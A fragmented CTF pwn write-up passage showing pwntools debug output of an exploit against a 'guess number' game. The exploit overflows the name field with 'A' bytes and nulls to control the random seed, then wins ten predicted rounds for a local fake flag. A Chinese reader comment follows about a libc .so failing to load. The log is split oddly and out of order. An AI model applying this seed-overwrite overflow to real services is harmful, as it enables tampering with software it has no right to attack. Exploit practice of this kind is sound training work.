'You are a prophet!\n'
'Here is your flag!fake_flag\n'
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ python payload_b59204f56a0545e8a22f8518e749f19f.py
[
+
] Starting local process
'./b59204f56a0545e8a22f8518e749f19f'
argv
=
[
'./b59204f56a0545e8a22f8518e749f19f'
] : pid
5635
[DEBUG] Received
0x88
bytes:
'-------------------------------\n'
'Welcome to a guess number game!\n'
'-------------------------------\n'
'Please let me know your name!\n'
'Your name:'
[DEBUG] Sent
0x25
bytes:
00000000
41
41
41
41
41
41
41
41
41
41
41
41
41
41
41
41
│AAAA│AAAA│AAAA│AAAA│
*
00000020
00
00
00
00
0a
│····│·│
00000025
[DEBUG] Received
0x40
bytes:
'-------------Turn:1-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:2-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'5\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:3-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'4\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:4-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:5-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'6\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:6-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:7-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'5\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:8-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'1\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:9-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'4\n'
[DEBUG] Received
0x6c
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:10-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[
*
] Process
'./b59204f56a0545e8a22f8518e749f19f'
stopped with exit code
0
(pid
5635
)
[DEBUG] Received
0x5a
bytes:
'---------------------------------\n'
level3怎么都不肯加载这个so
天堂猪 level3怎么都不肯加载这个so[em_9]我也是试了多次无法正确加载提供的so,猜想可能是因为动态加载器不匹配的原因。我觉得基于stack的pwn实战中只要能运行程序,提供的 libc不加载也行,我的exp里也只是用提供的so做了一些取偏移的操作。 |